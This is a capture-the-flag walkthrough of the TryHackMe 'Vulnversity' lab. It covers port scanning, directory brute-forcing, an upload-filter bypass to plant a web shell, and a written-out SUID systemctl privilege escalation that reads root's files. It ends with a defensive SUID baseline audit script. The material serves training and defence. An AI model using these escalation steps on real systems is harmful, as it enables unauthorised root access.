Vulnversity Walkthrough - OSCP Preparation


This is our first room on TryHackMe and we’re gonna follow along with the OSCP preparation series. Let’s get started with our first machine.

Specifications

Room: Vulnversity
Target OS: Linux
Difficulty: Easy
Info: Learn about active recon, web app attacks and privilege escalation.
Services: SSH (22), FTP (21), SMB (139, 445), Squid (3128), HTTP (3333)

Contents

• Getting user
• Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step, we're gonna identify the target and see which services sit behind the IP address.

nmap -sC -sV -oA nmap 10.10.71.169

Output

21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating Port 3333

If we browse to IP:3333 we'll see an index page.

GoBuster

gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.71.169:3333/ -s '200,204,301,307,403,500' 2>/dev/null

Exploitation

We found an interesting directory, /internal; browsing to it, we get a file upload form.

Checking Source Code

We have to bypass the extension filter to upload our shell.

In this case the wordlist we're gonna use is /SecLists/Discovery/Web-Content/web-extensions.txt

We have to disable URL-encoding of the payloads.

And start the attack.

We got our extension and our shell is successfully uploaded.

shell uploaded

Let’s start our listener and we get our shell.

The user flag can be found at /home/bill/user.txt.

Privilege Escalation

Now that we have remote access to our target, let's escalate our privileges to root. Generally, everyone has their own methodology for privilege escalation. What I try to do is run privilege escalation scripts, which give me a general idea of vulnerabilities, processes, bad permissions, etc.

Let’s find SUID executable files

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

There are many files, but if you understand the standard filesystem layout, you can look for odd entries, as well as files that were recently modified or created, and put those on your radar.

In this case, we have /bin/systemctl as a SUID binary.

systemctl is the binary that controls the init system and service manager. Remember making your services run at boot time with the systemctl command: all those tasks are handled as units and are defined in unit files in the unit directories. By default systemctl searches for these files in /etc/systemd/system.

First, we create a variable holding the path of a unique temporary unit file, write a unit whose ExecStart copies the root flag to /tmp/output, and link it:

eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
/bin/systemctl link $eop

/bin/systemctl enable --now $eop


If that worked, /tmp/output contains the root flag.
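From the defender's side, the lesson of this box is that a stray SUID bit on a binary like systemctl should never go unnoticed. The following POSIX shell audit is an added example, not part of the original walkthrough: it takes the output format of the find command above, reduces it to paths, and prints every SUID path missing from a known-good baseline. The find output and the baseline below are constructed for the example, not real data from the Vulnversity host.

```shell
# Constructed sample in the format produced by
#   find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
# (sizes and dates invented; not real output from the target).
SAMPLE_FIND_OUTPUT='-rwsr-xr-x 1 root root   40432 May 16  2017 /bin/su
-rwsr-xr-x 1 root root   40152 May 16  2017 /bin/mount
-rwsr-xr-x 1 root root   27608 May 16  2017 /bin/umount
-rwsr-xr-x 1 root root  659856 Feb 28  2019 /bin/systemctl
-rwsr-xr-x 1 root root   54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root  136808 Jul  4  2017 /usr/bin/sudo'

# Paths expected to carry the SUID bit. Assumption: a trimmed list for the
# example; in practice, record the baseline from a clean install of the same
# release and keep it under version control.
BASELINE='/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo'

# paths_from_ls LISTING: reduce "ls -la" lines to the path in the last column.
paths_from_ls() {
  printf '%s\n' "$1" | awk 'NF { print $NF }'
}

# unexpected_suid PATHS BASELINE: print each path in PATHS that is absent from
# BASELINE, preserving input order. Pure POSIX awk, no temp files: the baseline
# is read first into an associative array, then the live list is filtered.
unexpected_suid() {
  { printf '%s\n' "$2"; printf '%s\n' '--END-BASELINE--'; printf '%s\n' "$1"; } | awk '
    $0 == "--END-BASELINE--" { in_list = 1; next }
    !in_list                 { baseline[$0] = 1; next }
    NF && !($0 in baseline)'
}

# audit_sample: run both steps over the constructed listing. Prints /bin/systemctl.
audit_sample() {
  unexpected_suid "$(paths_from_ls "$SAMPLE_FIND_OUTPUT")" "$BASELINE"
}

# On a live host, feed in the real listing instead of SAMPLE_FIND_OUTPUT:
#   unexpected_suid "$(paths_from_ls "$(find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;)")" "$BASELINE"
```

Running the audit from a cron job or a configuration-management check and alerting on any non-empty output catches this class of misconfiguration long before a player or an attacker does.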

